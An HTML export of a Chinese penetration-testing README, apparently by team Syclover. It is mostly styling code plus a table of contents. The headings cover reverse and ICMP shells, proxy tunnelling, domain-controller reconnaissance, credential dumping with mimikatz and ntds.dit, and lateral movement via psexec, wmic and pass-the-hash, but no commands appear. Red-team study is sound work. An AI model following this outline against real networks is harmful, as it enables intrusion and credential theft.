README.html

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <title>README.html</title>
  <meta name="generator" content="Haroopad 0.13.1" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <style>div.oembedall-githubrepos{border:1px solid #DDD;border-radius:4px;list-style-type:none;margin:0 0 10px;padding:8px 10px 0;font:13.34px/1.4 helvetica,arial,freesans,clean,sans-serif;width:452px;background-color:#fff}div.oembedall-githubrepos .oembedall-body{background:-moz-linear-gradient(center top,#FAFAFA,#EFEFEF);background:-webkit-gradient(linear,left top,left bottom,from(#FAFAFA),to(#EFEFEF));border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-top:1px solid #EEE;margin-left:-10px;margin-top:8px;padding:5px 10px;width:100%}div.oembedall-githubrepos h3{font-size:14px;margin:0;padding-left:18px;white-space:nowrap}div.oembedall-githubrepos p.oembedall-description{color:#444;font-size:12px;margin:0 0 3px}div.oembedall-githubrepos p.oembedall-updated-at{color:#888;font-size:11px;margin:0}div.oembedall-githubrepos ul.oembedall-repo-stats{border:none;float:right;font-size:11px;font-weight:700;padding-left:15px;position:relative;z-index:5;margin:0}div.oembedall-githubrepos ul.oembedall-repo-stats li{border:none;color:#666;display:inline-block;list-style-type:none;margin:0!important}div.oembedall-githubrepos ul.oembedall-repo-stats li a{background-color:transparent;border:none;color:#666!important;background-position:5px -2px;background-repeat:no-repeat;border-left:1px solid #DDD;display:inline-block;height:21px;line-height:21px;padding:0 5px 0 23px}div.oembedall-githubrepos ul.oembedall-repo-stats li:first-child a{border-left:medium none;margin-right:-3px}div.oembedall-githubrepos ul.oembedall-repo-stats li a:hover{background:5px -27px no-repeat #4183C4;color:#FFF!important;text-decoration:none}div.oembedall-githubrepos ul.oembedall-repo-stats li:first-child a:hover{border-bottom-left-radius:3px;border-top-left-radius:3px}ul.oembedall-repo-stats li:last-child a:hover{border-bottom-right-radius:3px;border-top-right-radius:3px}span.oembedall-closehide{background-color:#aaa;border-radius:2px;cursor:pointer;margin-right:3px}div.oembedall-container{margin-top:5px;text-align:left}.oembedall-ljuser{font-weight:700}.oembedall-ljuser img{vertical-align:bottom;border:0;padding-right:1px}.oembedall-stoqembed{border-bottom:1px dotted #999;float:left;overflow:hidden;width:730px;line-height:1;background:#FFF;color:#000;font-family:Arial,Liberation Sans,DejaVu Sans,sans-serif;font-size:80%;text-align:left;margin:0;padding:0}.oembedall-stoqembed a{color:#07C;text-decoration:none;margin:0;padding:0}.oembedall-stoqembed a:hover{text-decoration:underline}.oembedall-stoqembed a:visited{color:#4A6B82}.oembedall-stoqembed h3{font-family:Trebuchet MS,Liberation Sans,DejaVu Sans,sans-serif;font-size:130%;font-weight:700;margin:0;padding:0}.oembedall-stoqembed .oembedall-reputation-score{color:#444;font-size:120%;font-weight:700;margin-right:2px}.oembedall-stoqembed .oembedall-user-info{height:35px;width:185px}.oembedall-stoqembed .oembedall-user-info .oembedall-user-gravatar32{float:left;height:32px;width:32px}.oembedall-stoqembed .oembedall-user-info .oembedall-user-details{float:left;margin-left:5px;overflow:hidden;white-space:nowrap;width:145px}.oembedall-stoqembed .oembedall-question-hyperlink{font-weight:700}.oembedall-stoqembed .oembedall-stats{background:#EEE;margin:0 0 0 7px;padding:4px 7px 6px;width:58px}.oembedall-stoqembed .oembedall-statscontainer{float:left;margin-right:8px;width:86px}.oembedall-stoqembed .oembedall-votes{color:#555;padding:0 0 7px;text-align:center}.oembedall-stoqembed .oembedall-vote-count-post{font-size:240%;color:#808185;display:block;font-weight:700}.oembedall-stoqembed .oembedall-views{color:#999;padding-top:4px;text-align:center}.oembedall-stoqembed .oembedall-status{margin-top:-3px;padding:4px 0;text-align:center;background:#75845C;color:#FFF}.oembedall-stoqembed .oembedall-status strong{color:#FFF;display:block;font-size:140%}.oembedall-stoqembed .oembedall-summary{float:left;width:635px}.oembedall-stoqembed .oembedall-excerpt{line-height:1.2;margin:0;padding:0 0 5px}.oembedall-stoqembed .oembedall-tags{float:left;line-height:18px}.oembedall-stoqembed .oembedall-tags a:hover{text-decoration:none}.oembedall-stoqembed .oembedall-post-tag{background-color:#E0EAF1;border-bottom:1px solid #3E6D8E;border-right:1px solid #7F9FB6;color:#3E6D8E;font-size:90%;line-height:2.4;margin:2px 2px 2px 0;padding:3px 4px;text-decoration:none;white-space:nowrap}.oembedall-stoqembed .oembedall-post-tag:hover{background-color:#3E6D8E;border-bottom:1px solid #37607D;border-right:1px solid #37607D;color:#E0EAF1}.oembedall-stoqembed .oembedall-fr{float:right}.oembedall-stoqembed .oembedall-statsarrow{background-image:url(http://cdn.sstatic.net/stackoverflow/img/sprites.png?v=3);background-repeat:no-repeat;overflow:hidden;background-position:0 -435px;float:right;height:13px;margin-top:12px;width:7px}.oembedall-facebook1{border:1px solid #1A3C6C;padding:0;font:13.34px/1.4 verdana;width:500px}.oembedall-facebook2{background-color:#627add}.oembedall-facebook2 a{color:#e8e8e8;text-decoration:none}.oembedall-facebookBody{background-color:#fff;vertical-align:top;padding:5px}.oembedall-facebookBody .contents{display:inline-block;width:100%}.oembedall-facebookBody div img{float:left;margin-right:5px}div.oembedall-lanyard{-webkit-box-shadow:none;-webkit-transition-delay:0s;-webkit-transition-duration:.4000000059604645s;-webkit-transition-property:width;-webkit-transition-timing-function:cubic-bezier(0.42,0,.58,1);background-attachment:scroll;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;border-width:0;box-shadow:none;color:#112644;display:block;float:left;font-family:'Trebuchet MS',Trebuchet,sans-serif;font-size:16px;height:253px;line-height:19px;margin:0;max-width:none;min-height:0;outline:#112644 0;overflow-x:visible;overflow-y:visible;padding:0;position:relative;text-align:left;vertical-align:baseline;width:804px}div.oembedall-lanyard .tagline{font-size:1.5em}div.oembedall-lanyard .wrapper{overflow:hidden;clear:both}div.oembedall-lanyard .split{float:left;display:inline}div.oembedall-lanyard .prominent-place .flag:active,div.oembedall-lanyard .prominent-place .flag:focus,div.oembedall-lanyard .prominent-place .flag:hover,div.oembedall-lanyard .prominent-place .flag:link,div.oembedall-lanyard .prominent-place .flag:visited{float:left;display:block;width:48px;height:48px;position:relative;top:-5px;margin-right:10px}div.oembedall-lanyard .place-context{font-size:.889em}div.oembedall-lanyard .prominent-place .sub-place{display:block}div.oembedall-lanyard .prominent-place{font-size:1.125em;line-height:1.1em;font-weight:400}div.oembedall-lanyard .main-date{color:#8CB4E0;font-weight:700;line-height:1.1}div.oembedall-lanyard .first{width:48.57%;margin:0 0 0 2.857%}.mermaid .label{color:#333}.node circle,.node polygon,.node rect{fill:#cde498;stroke:#13540c;stroke-width:1px}.edgePath .path{stroke:green;stroke-width:1.5px}.cluster rect{fill:#cdffb2;rx:40;stroke:#6eaa49;stroke-width:1px}.cluster text{fill:#333}.actor{stroke:#13540c;fill:#cde498}text.actor{fill:#000;stroke:none}.actor-line{stroke:grey}.messageLine0{stroke-width:1.5;stroke-dasharray:"2 2";marker-end:"url(#arrowhead)";stroke:#333}.messageLine1{stroke-width:1.5;stroke-dasharray:"2 2";stroke:#333}#arrowhead{fill:#333}#crosshead path{fill:#333!important;stroke:#333!important}.messageText{fill:#333;stroke:none}.labelBox{stroke:#326932;fill:#cde498}.labelText,.loopText{fill:#000;stroke:none}.loopLine{stroke-width:2;stroke-dasharray:"2 2";marker-end:"url(#arrowhead)";stroke:#326932}.note{stroke:#6eaa49;fill:#fff5ad}.noteText{fill:#000;stroke:none;font-family:'trebuchet ms',verdana,arial;font-size:14px}.section{stroke:none;opacity:.2}.section0,.section2{fill:#6eaa49}.section1,.section3{fill:#fff;opacity:.2}.sectionTitle0,.sectionTitle1,.sectionTitle2,.sectionTitle3{fill:#333}.sectionTitle{text-anchor:start;font-size:11px;text-height:14px}.grid .tick{stroke:lightgrey;opacity:.3;shape-rendering:crispEdges}.grid path{stroke-width:0}.today{fill:none;stroke:red;stroke-width:2px}.task{stroke-width:2}.taskText{text-anchor:middle;font-size:11px}.taskTextOutsideRight{fill:#000;text-anchor:start;font-size:11px}.taskTextOutsideLeft{fill:#000;text-anchor:end;font-size:11px}.taskText0,.taskText1,.taskText2,.taskText3{fill:#fff}.task0,.task1,.task2,.task3{fill:#487e3a;stroke:#13540c}.taskTextOutside0,.taskTextOutside1,.taskTextOutside2,.taskTextOutside3{fill:#000}.active0,.active1,.active2,.active3{fill:#cde498;stroke:#13540c}.activeText0,.activeText1,.activeText2,.activeText3{fill:#000!important}.done0,.done1,.done2,.done3{stroke:grey;fill:lightgrey;stroke-width:2}.doneText0,.doneText1,.doneText2,.doneText3{fill:#000!important}.crit0,.crit1,.crit2,.crit3{stroke:#f88;fill:red;stroke-width:2}.activeCrit0,.activeCrit1,.activeCrit2,.activeCrit3{stroke:#f88;fill:#cde498;stroke-width:2}.doneCrit0,.doneCrit1,.doneCrit2,.doneCrit3{stroke:#f88;fill:lightgrey;stroke-width:2;cursor:pointer;shape-rendering:crispEdges}.activeCritText0,.activeCritText1,.activeCritText2,.activeCritText3,.doneCritText0,.doneCritText1,.doneCritText2,.doneCritText3{fill:#000!important}.titleText{text-anchor:middle;font-size:18px;fill:#000}text{font-family:'trebuchet ms',verdana,arial;font-size:14px}html{height:100%}body{margin:0!important;padding:5px 20px 26px!important;background-color:#fff;font-family:"Lucida Grande","Segoe UI","Apple SD Gothic Neo","Malgun Gothic","Lucida Sans Unicode",Helvetica,Arial,sans-serif;font-size:.9em;overflow-x:hidden;overflow-y:auto}br,h1,h2,h3,h4,h5,h6{clear:both}hr.page{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x;border:0;height:3px;padding:0}hr.underscore{border-top-style:dashed!important}body >:first-child{margin-top:0!important}img.plugin{box-shadow:0 1px 3px rgba(0,0,0,.1);border-radius:3px}iframe{border:0}figure{-webkit-margin-before:0;-webkit-margin-after:0;-webkit-margin-start:0;-webkit-margin-end:0}kbd{border:1px solid #aaa;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;-moz-box-shadow:1px 2px 2px #ddd;-webkit-box-shadow:1px 2px 2px #ddd;box-shadow:1px 2px 2px #ddd;background-color:#f9f9f9;background-image:-moz-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:-o-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:-webkit-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:linear-gradient(top,#eee,#f9f9f9,#eee);padding:1px 3px;font-family:inherit;font-size:.85em}.oembeded .oembed_photo{display:inline-block}img[data-echo]{margin:25px 0;width:100px;height:100px;background:url(../img/ajax.gif) center center no-repeat #fff}.spinner{display:inline-block;width:10px;height:10px;margin-bottom:-.1em;border:2px solid rgba(0,0,0,.5);border-top-color:transparent;border-radius:100%;-webkit-animation:spin 1s infinite linear;animation:spin 1s infinite linear}.spinner:after{content:'';display:block;width:0;height:0;position:absolute;top:-6px;left:0;border:4px solid transparent;border-bottom-color:rgba(0,0,0,.5);-webkit-transform:rotate(45deg);transform:rotate(45deg)}@-webkit-keyframes spin{to{-webkit-transform:rotate(360deg)}}@keyframes spin{to{transform:rotate(360deg)}}p.toc{margin:0!important}p.toc ul{padding-left:10px}p.toc>ul{padding:10px;margin:0 10px;display:inline-block;border:1px solid #ededed;border-radius:5px}p.toc li,p.toc ul{list-style-type:none}p.toc li{width:100%;padding:0;overflow:hidden}p.toc li a::after{content:"."}p.toc li a:before{content:"• "}p.toc h5{text-transform:uppercase}p.toc .title{float:left;padding-right:3px}p.toc .number{margin:0;float:right;padding-left:3px;background:#fff;display:none}input.task-list-item{margin-left:-1.62em}.markdown{font-family:"Hiragino Sans GB","Microsoft YaHei",STHeiti,SimSun,"Lucida Grande","Lucida Sans Unicode","Lucida Sans",'Segoe UI',AppleSDGothicNeo-Medium,'Malgun Gothic',Verdana,Tahoma,sans-serif;padding:20px}.markdown a{text-decoration:none;vertical-align:baseline}.markdown a:hover{text-decoration:underline}.markdown h1{font-size:2.2em;font-weight:700;margin:1.5em 0 1em}.markdown h2{font-size:1.8em;font-weight:700;margin:1.275em 0 .85em}.markdown h3{font-size:1.6em;font-weight:700;margin:1.125em 0 .75em}.markdown h4{font-size:1.4em;font-weight:700;margin:.99em 0 .66em}.markdown h5{font-size:1.2em;font-weight:700;margin:.855em 0 .57em}.markdown h6{font-size:1em;font-weight:700;margin:.75em 0 .5em}.markdown h1+p,.markdown h1:first-child,.markdown h2+p,.markdown h2:first-child,.markdown h3+p,.markdown h3:first-child,.markdown h4+p,.markdown h4:first-child,.markdown h5+p,.markdown h5:first-child,.markdown h6+p,.markdown h6:first-child{margin-top:0}.markdown hr{border:1px solid #ccc}.markdown p{margin:1em 0;word-wrap:break-word}.markdown ol{list-style-type:decimal}.markdown li{display:list-item;line-height:1.4em}.markdown blockquote{margin:1em 20px}.markdown blockquote>:first-child{margin-top:0}.markdown blockquote>:last-child{margin-bottom:0}.markdown blockquote cite:before{content:'\2014 \00A0'}.markdown .code{border-radius:3px;word-wrap:break-word}.markdown pre{border-radius:3px;word-wrap:break-word;border:1px solid #ccc;overflow:auto;padding:.5em}.markdown pre code{border:0;display:block}.markdown pre>code{font-family:Consolas,Inconsolata,Courier,monospace;font-weight:700;white-space:pre;margin:0}.markdown code{border-radius:3px;word-wrap:break-word;border:1px solid #ccc;padding:0 5px;margin:0 2px}.markdown img{max-width:100%}.markdown mark{color:#000;background-color:#fcf8e3}.markdown table{padding:0;border-collapse:collapse;border-spacing:0;margin-bottom:16px}.markdown table tr td,.markdown table tr th{border:1px solid #ccc;margin:0;padding:6px 13px}.markdown table tr th{font-weight:700}.markdown table tr th>:first-child{margin-top:0}.markdown table tr th>:last-child{margin-bottom:0}.markdown table tr td>:first-child{margin-top:0}.markdown table tr td>:last-child{margin-bottom:0}@import url(http://fonts.googleapis.com/css?family=Roboto+Condensed:300italic,400italic,700italic,400,300,700);.haroopad{padding:20px;color:#222;font-size:15px;font-family:"Roboto Condensed",Tauri,"Hiragino Sans GB","Microsoft YaHei",STHeiti,SimSun,"Lucida Grande","Lucida Sans Unicode","Lucida Sans",'Segoe UI',AppleSDGothicNeo-Medium,'Malgun Gothic',Verdana,Tahoma,sans-serif;background:#fff;line-height:1.6;-webkit-font-smoothing:antialiased}.haroopad a{color:#3269a0}.haroopad a:hover{color:#4183c4}.haroopad h2{border-bottom:1px solid #e6e6e6}.haroopad h6{color:#777}.haroopad hr{border:1px solid #e6e6e6}.haroopad blockquote>code,.haroopad h1>code,.haroopad h2>code,.haroopad h3>code,.haroopad h4>code,.haroopad h5>code,.haroopad h6>code,.haroopad li>code,.haroopad p>code,.haroopad td>code{font-family:Consolas,"Liberation Mono",Menlo,Courier,monospace;font-size:85%;background-color:rgba(0,0,0,.02);padding:.2em .5em;border:1px solid #efefef}.haroopad pre>code{font-size:1em;letter-spacing:-1px;font-weight:700}.haroopad blockquote{border-left:4px solid #e6e6e6;padding:0 15px;color:#777}.haroopad table{background-color:#fafafa}.haroopad table tr td,.haroopad table tr th{border:1px solid #e6e6e6}.haroopad table tr:nth-child(2n){background-color:#f2f2f2}.hljs{display:block;overflow-x:auto;padding:.5em;background:#fdf6e3;color:#657b83;-webkit-text-size-adjust:none}.diff .hljs-header,.hljs-comment,.hljs-doctype,.hljs-javadoc,.hljs-pi,.lisp .hljs-string{color:#93a1a1}.css .hljs-tag,.hljs-addition,.hljs-keyword,.hljs-request,.hljs-status,.hljs-winutils,.method,.nginx .hljs-title{color:#859900}.hljs-command,.hljs-dartdoc,.hljs-hexcolor,.hljs-link_url,.hljs-number,.hljs-phpdoc,.hljs-regexp,.hljs-rules .hljs-value,.hljs-string,.hljs-tag .hljs-value,.tex .hljs-formula{color:#2aa198}.css .hljs-function,.hljs-built_in,.hljs-chunk,.hljs-decorator,.hljs-id,.hljs-identifier,.hljs-localvars,.hljs-title,.vhdl .hljs-literal{color:#268bd2}.hljs-attribute,.hljs-class .hljs-title,.hljs-constant,.hljs-link_reference,.hljs-parent,.hljs-type,.hljs-variable,.lisp .hljs-body,.smalltalk .hljs-number{color:#b58900}.css .hljs-pseudo,.diff .hljs-change,.hljs-attr_selector,.hljs-cdata,.hljs-header,.hljs-pragma,.hljs-preprocessor,.hljs-preprocessor .hljs-keyword,.hljs-shebang,.hljs-special,.hljs-subst,.hljs-symbol,.hljs-symbol .hljs-string{color:#cb4b16}.hljs-deletion,.hljs-important{color:#dc322f}.hljs-link_label{color:#6c71c4}.tex .hljs-formula{background:#eee8d5}.MathJax_Hover_Frame{border-radius:.25em;-webkit-border-radius:.25em;-moz-border-radius:.25em;-khtml-border-radius:.25em;box-shadow:0 0 15px #83A;-webkit-box-shadow:0 0 15px #83A;-moz-box-shadow:0 0 15px #83A;-khtml-box-shadow:0 0 15px #83A;border:1px solid #A6D!important;display:inline-block;position:absolute}.MathJax_Hover_Arrow{position:absolute;width:15px;height:11px;cursor:pointer}#MathJax_About{position:fixed;left:50%;width:auto;text-align:center;border:3px outset;padding:1em 2em;background-color:#DDD;color:#000;cursor:default;font-family:message-box;font-size:120%;font-style:normal;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;z-index:201;border-radius:15px;-webkit-border-radius:15px;-moz-border-radius:15px;-khtml-border-radius:15px;box-shadow:0 10px 20px gray;-webkit-box-shadow:0 10px 20px gray;-moz-box-shadow:0 10px 20px gray;-khtml-box-shadow:0 10px 20px gray;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}.MathJax_Menu{position:absolute;background-color:#fff;color:#000;width:auto;padding:2px;border:1px solid #CCC;margin:0;cursor:default;font:menu;text-align:left;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;z-index:201;box-shadow:0 10px 20px gray;-webkit-box-shadow:0 10px 20px gray;-moz-box-shadow:0 10px 20px gray;-khtml-box-shadow:0 10px 20px gray;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}.MathJax_MenuItem{padding:2px 2em;background:0 0}.MathJax_MenuArrow{position:absolute;right:.5em;color:#666}.MathJax_MenuActive .MathJax_MenuArrow{color:#fff}.MathJax_MenuArrow.RTL{left:.5em;right:auto}.MathJax_MenuCheck{position:absolute;left:.7em}.MathJax_MenuCheck.RTL{right:.7em;left:auto}.MathJax_MenuRadioCheck{position:absolute;left:1em}.MathJax_MenuRadioCheck.RTL{right:1em;left:auto}.MathJax_MenuLabel{padding:2px 2em 4px 1.33em;font-style:italic}.MathJax_MenuRule{border-top:1px solid #CCC;margin:4px 1px 0}.MathJax_MenuDisabled{color:GrayText}.MathJax_MenuActive{background-color:Highlight;color:HighlightText}.MathJax_Menu_Close{position:absolute;width:31px;height:31px;top:-15px;left:-15px}#MathJax_Zoom{position:absolute;background-color:#F0F0F0;overflow:auto;display:block;z-index:301;padding:.5em;border:1px solid #000;margin:0;font-weight:400;font-style:normal;text-align:left;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;box-shadow:5px 5px 15px #AAA;-webkit-box-shadow:5px 5px 15px #AAA;-moz-box-shadow:5px 5px 15px #AAA;-khtml-box-shadow:5px 5px 15px #AAA;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}#MathJax_ZoomOverlay{position:absolute;left:0;top:0;z-index:300;display:inline-block;width:100%;height:100%;border:0;padding:0;margin:0;background-color:#fff;opacity:0;filter:alpha(opacity=0)}#MathJax_ZoomFrame{position:relative;display:inline-block;height:0;width:0}#MathJax_ZoomEventTrap{position:absolute;left:0;top:0;z-index:302;display:inline-block;border:0;padding:0;margin:0;background-color:#fff;opacity:0;filter:alpha(opacity=0)}.MathJax_Preview{color:#888}#MathJax_Message{position:fixed;left:1px;bottom:2px;background-color:#E6E6E6;border:1px solid #959595;margin:0;padding:2px 8px;z-index:102;color:#000;font-size:80%;width:auto;white-space:nowrap}#MathJax_MSIE_Frame{position:absolute;top:0;left:0;width:0;z-index:101;border:0;margin:0;padding:0}.MathJax_Error{color:#C00;font-style:italic}footer{position:fixed;font-size:.8em;text-align:right;bottom:0;margin-left:-25px;height:20px;width:100%}</style>
</head>
<body class="markdown haroopad">
<p>Team:Syclover<br>Author:L3m0n<br>Email:iamstudy@126.com</p><p class="toc" style="undefined"></p><ul>
<li><ul>
<li><ul>
<li><span class="title">
<a href="#域环境搭建" title="域环境搭建">域环境搭建</a>
</span>
<!--span class="number">
0
</span-->
</li>
<li><span class="title">
<a href="#端口转发&amp;&amp;边界代理" title="端口转发&amp;&amp;边界代理">端口转发&amp;&amp;边界代理</a>
</span>
<!--span class="number">
1
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#端口转发" title="端口转发">端口转发</a>
</span>
<!--span class="number">
2
</span-->
</li>
<li><span class="title">
<a href="#socket代理" title="socket代理">socket代理</a>
</span>
<!--span class="number">
3
</span-->
</li>
<li><span class="title">
<a href="#神器推荐" title="神器推荐">神器推荐</a>
</span>
<!--span class="number">
4
</span-->
</li>
<li><span class="title">
<a href="#基于http的转发与socket代理(低权限下的渗透)" title="基于http的转发与socket代理(低权限下的渗透)">基于http的转发与socket代理(低权限下的渗透)</a>
</span>
<!--span class="number">
5
</span-->
</li>
<li><span class="title">
<a href="#ssh通道" title="ssh通道">ssh通道</a>
</span>
<!--span class="number">
6
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#获取shell" title="获取shell">获取shell</a>
</span>
<!--span class="number">
7
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#常规shell反弹" title="常规shell反弹">常规shell反弹</a>
</span>
<!--span class="number">
8
</span-->
</li>
<li><span class="title">
<a href="#突破防火墙的imcp_shell反弹" title="突破防火墙的imcp_shell反弹">突破防火墙的imcp_shell反弹</a>
</span>
<!--span class="number">
9
</span-->
</li>
<li><span class="title">
<a href="#shell反弹不出的时候" title="Shell反弹不出的时候">Shell反弹不出的时候</a>
</span>
<!--span class="number">
10
</span-->
</li>
<li><span class="title">
<a href="#正向shell" title="正向shell">正向shell</a>
</span>
<!--span class="number">
11
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#信息收集(结构分析)" title="信息收集(结构分析)">信息收集(结构分析)</a>
</span>
<!--span class="number">
12
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#基本命令" title="基本命令">基本命令</a>
</span>
<!--span class="number">
13
</span-->
</li>
<li><span class="title">
<a href="#定位域控" title="定位域控">定位域控</a>
</span>
<!--span class="number">
14
</span-->
</li>
<li><span class="title">
<a href="#端口收集" title="端口收集">端口收集</a>
</span>
<!--span class="number">
15
</span-->
</li>
<li><span class="title">
<a href="#扫描分析" title="扫描分析">扫描分析</a>
</span>
<!--span class="number">
16
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#内网文件传输" title="内网文件传输">内网文件传输</a>
</span>
<!--span class="number">
17
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#windows下文件传输" title="windows下文件传输">windows下文件传输</a>
</span>
<!--span class="number">
18
</span-->
</li>
<li><span class="title">
<a href="#linux下文件传输" title="linux下文件传输">linux下文件传输</a>
</span>
<!--span class="number">
19
</span-->
</li>
<li><span class="title">
<a href="#其他传输方式" title="其他传输方式">其他传输方式</a>
</span>
<!--span class="number">
20
</span-->
</li>
<li><span class="title">
<a href="#文件编译" title="文件编译">文件编译</a>
</span>
<!--span class="number">
21
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#hash抓取" title="hash抓取">hash抓取</a>
</span>
<!--span class="number">
22
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#hash简介" title="hash简介">hash简介</a>
</span>
<!--span class="number">
23
</span-->
</li>
<li><span class="title">
<a href="#本机hash+明文抓取" title="本机hash+明文抓取">本机hash+明文抓取</a>
</span>
<!--span class="number">
24
</span-->
</li>
<li><span class="title">
<a href="#win8+win2012明文抓取" title="win8+win2012明文抓取">win8+win2012明文抓取</a>
</span>
<!--span class="number">
25
</span-->
</li>
<li><span class="title">
<a href="#mimikatz" title="mimikatz">mimikatz</a>
</span>
<!--span class="number">
26
</span-->
</li>
<li><span class="title">
<a href="#ntds.dit的导出+quarkpwdump读取分析" title="ntds.dit的导出+QuarkPwDump读取分析">ntds.dit的导出+QuarkPwDump读取分析</a>
</span>
<!--span class="number">
27
</span-->
</li>
<li><span class="title">
<a href="#vssown.vbs-+-libesedb-+-ntdsxtract" title="vssown.vbs + libesedb + NtdsXtract">vssown.vbs + libesedb + NtdsXtract</a>
</span>
<!--span class="number">
28
</span-->
</li>
<li><span class="title">
<a href="#ntdsdump" title="ntdsdump">ntdsdump</a>
</span>
<!--span class="number">
29
</span-->
</li>
<li><span class="title">
<a href="#利用powershell(dsinternals)分析hash" title="利用powershell(DSInternals)分析hash">利用powershell(DSInternals)分析hash</a>
</span>
<!--span class="number">
30
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#远程连接&amp;&amp;执行程序" title="远程连接&amp;&amp;执行程序">远程连接&amp;&amp;执行程序</a>
</span>
<!--span class="number">
31
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#at&amp;schtasks" title="at&amp;schtasks">at&amp;schtasks</a>
</span>
<!--span class="number">
32
</span-->
</li>
<li><span class="title">
<a href="#psexec" title="psexec">psexec</a>
</span>
<!--span class="number">
33
</span-->
</li>
<li><span class="title">
<a href="#wmic" title="wmic">wmic</a>
</span>
<!--span class="number">
34
</span-->
</li>
<li><span class="title">
<a href="#wmiexec.vbs" title="wmiexec.vbs">wmiexec.vbs</a>
</span>
<!--span class="number">
35
</span-->
</li>
<li><span class="title">
<a href="#smbexec" title="smbexec">smbexec</a>
</span>
<!--span class="number">
36
</span-->
</li>
<li><span class="title">
<a href="#powershell-remoting" title="powershell remoting">powershell remoting</a>
</span>
<!--span class="number">
37
</span-->
</li>
<li><span class="title">
<a href="#sc创建服务执行" title="SC创建服务执行">SC创建服务执行</a>
</span>
<!--span class="number">
38
</span-->
</li>
<li><span class="title">
<a href="#schtasks" title="schtasks">schtasks</a>
</span>
<!--span class="number">
39
</span-->
</li>
<li><span class="title">
<a href="#smb+mof-||-dll-hijacks" title="SMB+MOF || DLL Hijacks">SMB+MOF || DLL Hijacks</a>
</span>
<!--span class="number">
40
</span-->
</li>
<li><span class="title">
<a href="#pth-+-compmgmt.msc" title="PTH + compmgmt.msc">PTH + compmgmt.msc</a>
</span>
<!--span class="number">
41
</span-->
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>

</ul>
